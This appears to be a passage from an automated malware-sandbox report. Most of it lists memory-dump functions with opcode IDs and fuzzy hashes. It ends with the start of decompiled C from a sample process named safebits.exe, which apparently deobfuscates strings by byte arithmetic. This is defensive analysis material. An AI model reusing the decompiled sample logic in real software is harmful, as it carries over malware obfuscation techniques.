                                                                Function 00007FFA31B505A9, Relevance: .2, Instructions: 212COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: af556599905a1eee7c3cfcabe11b59f570d216d3e610d53d172eaf2b5c7c6896
                                                                • Instruction ID: c89f9b33cc5b5c3229cb08947ca13969f5d3b5a88b4be94d4b8da9fc64b50068
                                                                • Opcode Fuzzy Hash: af556599905a1eee7c3cfcabe11b59f570d216d3e610d53d172eaf2b5c7c6896
                                                                • Instruction Fuzzy Hash: 48618270E1864A4FEB96DF28C4557B97BD1FF5A345F5080BAE40DC7282DE39D8409781
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B52150, Relevance: .2, Instructions: 183COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6584d1c734642ff1393df55cba86ffe0c941dd927dc15673166c5a38739b15c0
                                                                • Instruction ID: 2ee43ac57f3ede5484f6829541f5d7a91952ca758ec3458274a3b40e4e5e1140
                                                                • Opcode Fuzzy Hash: 6584d1c734642ff1393df55cba86ffe0c941dd927dc15673166c5a38739b15c0
                                                                • Instruction Fuzzy Hash: 874114BDA5510B4BFF2CDF5AE4C52B132D0FB59309B04B27DD44BCB282DE26D4428641
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B57339, Relevance: .2, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 324ca810811df17578abdb9af91b7e69fb0db4fa5340b2a7c00cac6e212b8b44
                                                                • Instruction ID: 156414f97cd638f33d40780b312cc511b25aaa0932694a38f9ba7d70f341ae24
                                                                • Opcode Fuzzy Hash: 324ca810811df17578abdb9af91b7e69fb0db4fa5340b2a7c00cac6e212b8b44
                                                                • Instruction Fuzzy Hash: 9A510670B0CA464FEB4AAB38885967D7BD1EF5A301F4580BAE44EC72D3DE29E8415342
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B530A1, Relevance: .2, Instructions: 175COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 35bafdf05c7fbf560c64f76f231fdfc86decc6d48beda3d577130e32fa44fcf9
                                                                • Instruction ID: 286476efa457fa54cb1478146c3b59eeda4a12e59eb135ef660fe17649818ce9
                                                                • Opcode Fuzzy Hash: 35bafdf05c7fbf560c64f76f231fdfc86decc6d48beda3d577130e32fa44fcf9
                                                                • Instruction Fuzzy Hash: C1512661E0DB854FD7628F38C4412667BE0FF06315F1496BDE48DC73A2DA2AE8059792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B59038, Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2901ade2cde31ff9dad185bbfd37fc859b636ca6db5bf0f3b9835e27d99cd6fe
                                                                • Instruction ID: 4b19df2613ec5d27fbfce4b8b5f8acd6c43bb4e468a899cb12ecb69e12b4a23e
                                                                • Opcode Fuzzy Hash: 2901ade2cde31ff9dad185bbfd37fc859b636ca6db5bf0f3b9835e27d99cd6fe
                                                                • Instruction Fuzzy Hash: 6031A110F18B490FFB96AB7C589A3B83AD1DF6B241F4480BAE44EC7393ED199C458342
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B50CA6, Relevance: .1, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ddc2441417e1005cb679cd3272327063db0995654e6f9607473a17bf71705c23
                                                                • Instruction ID: e73576db317065b30c787c93dc827c160036e25467958ced50585fd5edd724e6
                                                                • Opcode Fuzzy Hash: ddc2441417e1005cb679cd3272327063db0995654e6f9607473a17bf71705c23
                                                                • Instruction Fuzzy Hash: 5B21067DE49A0F4BFBA3DB69D0912BD56C1EB69301F45B174D80FCB2C2CD1AAC006241
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B57F50, Relevance: .1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fdd7198f2487b48146a0eec2a69e425ca6c885492bcf1998e36f0fc1a0a4b99e
                                                                • Instruction ID: 10c70dd8039415eb8e843e6454bdf063a023513480672160d061d2659c023ea0
                                                                • Opcode Fuzzy Hash: fdd7198f2487b48146a0eec2a69e425ca6c885492bcf1998e36f0fc1a0a4b99e
                                                                • Instruction Fuzzy Hash: 52310610F0978A4FEF9AFB24C4542B936C1AF56206F94A0BAF44ECB1D2CE1A9C417742
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B5233D, Relevance: .1, Instructions: 96COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb2f4b576fbe1680c74e1f2995ea24294c3d094623c6bb9d63e9293cfbf347f1
                                                                • Instruction ID: dfc6d1c32d1dbd0304e2b335acb70312828b1ed1a6876973de20d03006be3817
                                                                • Opcode Fuzzy Hash: fb2f4b576fbe1680c74e1f2995ea24294c3d094623c6bb9d63e9293cfbf347f1
                                                                • Instruction Fuzzy Hash: 65219461E0DA468FEB969F68C0D96743BD0FF6E305F0460F4C54ECB293DD16A845A301
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B57E74, Relevance: .1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c95b4a0fbdefa55f01bdf778a06ae1526192efc6575c0193dfc8aee8f2be09f
                                                                • Instruction ID: 051997498e6a2bca7d867a1269ad718725e4acca6c38d7da700872e726236f90
                                                                • Opcode Fuzzy Hash: 2c95b4a0fbdefa55f01bdf778a06ae1526192efc6575c0193dfc8aee8f2be09f
                                                                • Instruction Fuzzy Hash: AA21F750F0969A4FFB9AFB24C45527936C2AF56306F94A0BAF44DCB1D2CE1A9C417302
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B58209, Relevance: .1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e17af6cc16ddd882ed8206ba7ca22aa211f07000a9415504963632674c6d3d9
                                                                • Instruction ID: c6c35c12a49e21c46c0917e1e21d2539654c99979674387dc1e42d9bce132af7
                                                                • Opcode Fuzzy Hash: 0e17af6cc16ddd882ed8206ba7ca22aa211f07000a9415504963632674c6d3d9
                                                                • Instruction Fuzzy Hash: 7B113361A0CF8E0FE7AA972C98517B52BD0EB96364F0881BAE08DCB1C3DE5D95459342
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B57FD9, Relevance: .1, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61b039d899ab6502994b07e1efe4d762615c06d4307fe9e293bc469b3c64ecf5
                                                                • Instruction ID: 436db67dbebb672eee8dc67e2fb6399dfece2afc00d1d3d71a6c5ccc36fdeff2
                                                                • Opcode Fuzzy Hash: 61b039d899ab6502994b07e1efe4d762615c06d4307fe9e293bc469b3c64ecf5
                                                                • Instruction Fuzzy Hash: 28218752F58B4A0FE756A76D0C5A2F93B91EFAA210B498077E80CC7297DC1D7C468391
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B50E6E, Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a8f1d5ea0356319a93911800ed25cc551cc0787bf09f9a22fdd4c3ff9fb49e7
                                                                • Instruction ID: c766441a44e85771daeaa171677aee64067c5301bfb9e5daebf628a7cc53f0af
                                                                • Opcode Fuzzy Hash: 2a8f1d5ea0356319a93911800ed25cc551cc0787bf09f9a22fdd4c3ff9fb49e7
                                                                • Instruction Fuzzy Hash: CE218E7090C78E4FEB52DF28C8556A97BA0FF5A304F1484BAE44DCB182CE7999149752
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B57C6F, Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c3ba06ed358c9c8920a2d6e8a1289594c7e0e4435e0116df2531d5f52e162a32
                                                                • Instruction ID: 685a99cd856d65fdf0b9db6637de1f38671506a08912dea526b1e3d169a0d116
                                                                • Opcode Fuzzy Hash: c3ba06ed358c9c8920a2d6e8a1289594c7e0e4435e0116df2531d5f52e162a32
                                                                • Instruction Fuzzy Hash: CF11E244A0E3C91FE357577888A96B57F91CF97221F4ED4FAC0C9CB0A3ED09881A9352
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B503F8, Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7b7c05821edad7663a6dd61e9bcc8c2594e1c8f7e242e69ebf8c59af46ee48f1
                                                                • Instruction ID: 7a3de872ff22e242f51d4190d1b5a061be14429c4fed64d3a633aa013086ab53
                                                                • Opcode Fuzzy Hash: 7b7c05821edad7663a6dd61e9bcc8c2594e1c8f7e242e69ebf8c59af46ee48f1
                                                                • Instruction Fuzzy Hash: 8C11BC52A0DB990FE7A6A76C686A2753FE0DB5B261B0980F6D44CCB297DC055C064393
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B57D25, Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80ca6ff9b3edda0af9012f37827e2f16b027d7bc5d0e407bfa5f9c0ba0eec5b8
                                                                • Instruction ID: 28adc7a8ce4cafbf48ee660819cd822f17db8ab7e795293b1e57650e81b366f4
                                                                • Opcode Fuzzy Hash: 80ca6ff9b3edda0af9012f37827e2f16b027d7bc5d0e407bfa5f9c0ba0eec5b8
                                                                • Instruction Fuzzy Hash: 5311D662E1C2854FD7069F34C8445B93BD1AF57204F5890F5E44DCB1D7DD29E400A762
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B5777F, Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: adadd966326a4ffe7d4762b869ae59ac5dd17bf41d178eb9f4235c8e37f4b89b
                                                                • Instruction ID: 508c083ec44a9ca33dc51a0ffddf57812df5c207167c3936574a901758648132
                                                                • Opcode Fuzzy Hash: adadd966326a4ffe7d4762b869ae59ac5dd17bf41d178eb9f4235c8e37f4b89b
                                                                • Instruction Fuzzy Hash: 70216A6090D3C69FE7138B38C895AA57FA0AF07210F4E84EAD4C98F093DA69D549D793
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B58321, Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81b2755cd6e77e12176a00d78dbf90a30379937a46e4b2d65d640e9c5c8b6e2d
                                                                • Instruction ID: a0d71e2c89283dfcc69cd87d78a2a003f6fff66b2faf9dfbd0bfa288e37f5e1d
                                                                • Opcode Fuzzy Hash: 81b2755cd6e77e12176a00d78dbf90a30379937a46e4b2d65d640e9c5c8b6e2d
                                                                • Instruction Fuzzy Hash: AC012841F1976A0ED71E6B3E58B02BA2BC09B66116B444077F84DCA1C3FC09CD092391
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B57DF5, Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9dae9ccc87b82269a8a94fac6c86961f06bf960f9de39ec13e569555b036fac3
                                                                • Instruction ID: 026b29f83005d111afb207f04ad25734e62555d07c1bdc57566d87eeaa430ac5
                                                                • Opcode Fuzzy Hash: 9dae9ccc87b82269a8a94fac6c86961f06bf960f9de39ec13e569555b036fac3
                                                                • Instruction Fuzzy Hash: 820149B2C097894FD742EF644C492963FE0FF16300F1A40E7E84CCB152DA3899459391
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B51DFD, Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 97f04ef0049f3ccf4b66ff3d048e2537f6953f7370ab3dfeb799621fa2168e1a
                                                                • Instruction ID: b1220ca0441f173d01dd0d9f9ad6f29e20ac31c1898ce20f1a63e88da5c2a07f
                                                                • Opcode Fuzzy Hash: 97f04ef0049f3ccf4b66ff3d048e2537f6953f7370ab3dfeb799621fa2168e1a
                                                                • Instruction Fuzzy Hash: C001BC60A4CB420FE75A5B288896B303FA1EF5A305F5584BAE05DCB193E81DC8069741
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B58762, Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 984881342e0dc44d073a58c38e8e53bb25a204783e12a64ac2b431b96e20b88e
                                                                • Instruction ID: ec370263706866cc6ed36accb348d35c44948a9acb8511e06f5f4888c0049c00
                                                                • Opcode Fuzzy Hash: 984881342e0dc44d073a58c38e8e53bb25a204783e12a64ac2b431b96e20b88e
                                                                • Instruction Fuzzy Hash: DA116D5480E3C65FE7534BB49819A907FA09F03624F4F94EED0C4CF0A3DA8D484AD7A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B529B2, Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 582cbacbbf230822f7badb4760d56c3eddfb8b93f037dc333595b75b593ab569
                                                                • Instruction ID: 9d7586888df052aa93eec00fd6586f84062f7215e97af0e1e3f021a0e40631bd
                                                                • Opcode Fuzzy Hash: 582cbacbbf230822f7badb4760d56c3eddfb8b93f037dc333595b75b593ab569
                                                                • Instruction Fuzzy Hash: E701D121F0460A4FE784A77C909D27C27D1EF8E293B0069BAE80DCB3A7ED255C474341
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B50539, Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f0d5b959c94cfdd34d13595d6f3dd138d2178c1cd607b676390371a83d389e33
                                                                • Instruction ID: b23fb7b14c0d6a316720ef394a74b05c3b4435078391d6d45ad0bbacc0ef0693
                                                                • Opcode Fuzzy Hash: f0d5b959c94cfdd34d13595d6f3dd138d2178c1cd607b676390371a83d389e33
                                                                • Instruction Fuzzy Hash: 3BF09082E0DB890FE357673C689627C2B91EB9B155B4940F7D44CCA2D7EC0A49565312
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B54B31, Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 318a0fa8c5789a09c183d8eabf15e667d4ab9a4b5f9c5f6361681fa14ae027e7
                                                                • Instruction ID: 0ab8a1530eddfafaf308db7f411176f959573c1ec77bac52550541a0960a9c69
                                                                • Opcode Fuzzy Hash: 318a0fa8c5789a09c183d8eabf15e667d4ab9a4b5f9c5f6361681fa14ae027e7
                                                                • Instruction Fuzzy Hash: B8F02E84E0D7860FEB574B3458E92E07FA0EF0B221B1590FAD188CF283EC4A18828381
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B540F1, Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 478bebfedc8a167ca8aecff9820e8784a461268d8adf5aefe178a479949ec8cf
                                                                • Instruction ID: d0e17038d4a46cb2f4bb6b19fdf6c9db5a03db2108724b6d1f9bfa7df9856f0d
                                                                • Opcode Fuzzy Hash: 478bebfedc8a167ca8aecff9820e8784a461268d8adf5aefe178a479949ec8cf
                                                                • Instruction Fuzzy Hash: B9F0B420B28D4C0FDBD5EF6E545977837C2EB8D222B08807AE84EC3282DD18ED456301
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B5209D, Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17085baa8a0549b5ef33f597b748003d5504d48707f76d316b1c07c776ec15ab
                                                                • Instruction ID: 25cd3ac29d1cbca1d1c97432e9662949e440d3626761ed48194d635be0497f45
                                                                • Opcode Fuzzy Hash: 17085baa8a0549b5ef33f597b748003d5504d48707f76d316b1c07c776ec15ab
                                                                • Instruction Fuzzy Hash: 08F08C81A4E7C90FD707577448AA5607FE19FAF01134E50F7D889CF2A3DC090D499362
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B506F0, Relevance: .0, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e41f8362acba743ded97d1fdaf4f0c2edfe605b8eda309cda1ec8420bdade0ba
                                                                • Instruction ID: ff7dcb6afa54e1c1cd9d86c6ead584e331fdf9f387d2889e431259dbce4f21fd
                                                                • Opcode Fuzzy Hash: e41f8362acba743ded97d1fdaf4f0c2edfe605b8eda309cda1ec8420bdade0ba
                                                                • Instruction Fuzzy Hash: D8F0F661E0FA4F4FEB979F68C4545753780FF06246F14507BE44DC7092DE06E804A692
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B583A9, Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 242a4b7ceea92f7747ac5e95de08e612e7f4f69c211a4febbb6c6a40fef2dcfc
                                                                • Instruction ID: d19c794e51cd6729c17e7c4ba23df5e3f5032d7be4580325b8aa067c3ca288df
                                                                • Opcode Fuzzy Hash: 242a4b7ceea92f7747ac5e95de08e612e7f4f69c211a4febbb6c6a40fef2dcfc
                                                                • Instruction Fuzzy Hash: 99E06D20B1891D0FDB55FB6C98917A8B3C3EBC8711B5480B2E50EC7286DE2998425782
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B502F1, Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 884317148644b3ddbcfcfc992c7174a4d9a517ff5affea2135706a2a2e516de4
                                                                • Instruction ID: f26901b11572ae05edc146006d7cc37a855d7b6644c5f7e3d93aac8a2787c4d4
                                                                • Opcode Fuzzy Hash: 884317148644b3ddbcfcfc992c7174a4d9a517ff5affea2135706a2a2e516de4
                                                                • Instruction Fuzzy Hash: 5CF0E5A1C8D7CD4FDB035B2448922F93B60EF1B206F4440B3E84CCA083DD1A5214A382
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B5081F, Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e516976bc610c946ba3f07c5ad5942403cd19fd0d9cffeae170c0e3694ec33c
                                                                • Instruction ID: f4655a4dc906ac8cc7aecb762f4a2cc9447f92ddf572dc24f16798fb8d675b48
                                                                • Opcode Fuzzy Hash: 2e516976bc610c946ba3f07c5ad5942403cd19fd0d9cffeae170c0e3694ec33c
                                                                • Instruction Fuzzy Hash: 2DE068A990EA8D0FEF82EF48DC008657754FB0621EF0202FAE84CC3042DA269C098382
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B54718, Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6772c103b912c560282c66a90bb46e54278062bde3218817fc5dd30af2eb70c1
                                                                • Instruction ID: afd0493d113d5b36e8557094534c55c8e6f85effef2d3f18a7e3ecf5026869a5
                                                                • Opcode Fuzzy Hash: 6772c103b912c560282c66a90bb46e54278062bde3218817fc5dd30af2eb70c1
                                                                • Instruction Fuzzy Hash: 73E0C200B18E090FDBD4AB2C88D973523C2EBAE145F00D575A00EC339ADD14D8064300
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B577E0, Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 866128c4c5ebe6efeb7a808cb419ce423292e24fc7cf6a0cf8130ddc74b8be73
                                                                • Instruction ID: 010954ad151ccb11a0ba18f8889b4fcbea23c5b22eab56febe4cf3257df3245f
                                                                • Opcode Fuzzy Hash: 866128c4c5ebe6efeb7a808cb419ce423292e24fc7cf6a0cf8130ddc74b8be73
                                                                • Instruction Fuzzy Hash: 1EE0923092868E9BEF029F35C8053BA3BD0BF05304F44C4A6F84DCA081DE38E244D693
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFA31B51495, Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.818182938.00007FFA31B50000.00000040.00000001.sdmp, Offset: 00007FFA31B50000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e229871ad1bf86b9bb664c628d116314aa15d83dcf8663dbf58f362966acbcc2
                                                                • Instruction ID: 02b06ef68deed090f64f325c43ae4ff1f2857b41bcbad964de29bfbf01ccebb0
                                                                • Opcode Fuzzy Hash: e229871ad1bf86b9bb664c628d116314aa15d83dcf8663dbf58f362966acbcc2
                                                                • Instruction Fuzzy Hash: 57D01261E0DB8A8FFB929FA9845913C3DD0BF1A205F441077D50DC7152DE699C059706
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Analysis Process: safebits.exe PID: 5576 Parent PID: 6644 safebits.exeCOMMON

                                                                Executed Functions

                                                                Function 00401B70, Relevance: 193.0, APIs: 71, Strings: 39, Instructions: 545stringsleepregistryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 81%
                                                                			E00401B70() {
				void* _t42;
				char* _t44;
				struct HINSTANCE__* _t58;
				int _t61;
				void* _t97;
				int _t112;
				intOrPtr* _t119;
				void* _t120;
				signed char _t123;
				void* _t143;
				signed char _t144;
				char* _t145;
				void* _t162;
				signed char _t174;
				signed int _t177;
				void* _t178;
				void* _t185;
				void* _t210;
				char* _t212;

				_t44 = _t42 + 1 - 0xe5bf5a71;
				 *((char*)(_t44 + 0x1b)) = 0x4e;
				 *_t44 =  *_t44 + 1;
				 *((char*)(_t44 + 1)) =  *((char*)(_t44 + 1)) - 1;
				_t145 = _t44;
				 *((char*)(_t145 + 0xd)) =  *((char*)(_t145 + 0xd)) - 1;
				 *((char*)(_t145 + 0xe)) =  *((char*)(_t145 + 0xe)) - 1;
				 *((char*)(_t145 + 0x21)) =  *((char*)(_t145 + 0x21)) + 1;
				 *((char*)(_t145 + 0x25)) =  *((char*)(_t145 + 0x25)) - 1;
				 *((char*)(_t145 + 0x14)) =  *((char*)(_t145 + 0x14)) - 1;
				 *((char*)(_t145 + 0x13)) =  *((char*)(_t145 + 0x13)) - 1;
				 *((intOrPtr*)(_t44 + 0x2d)) =  *((intOrPtr*)(_t44 + 0x2d)) - 0x7950f117;
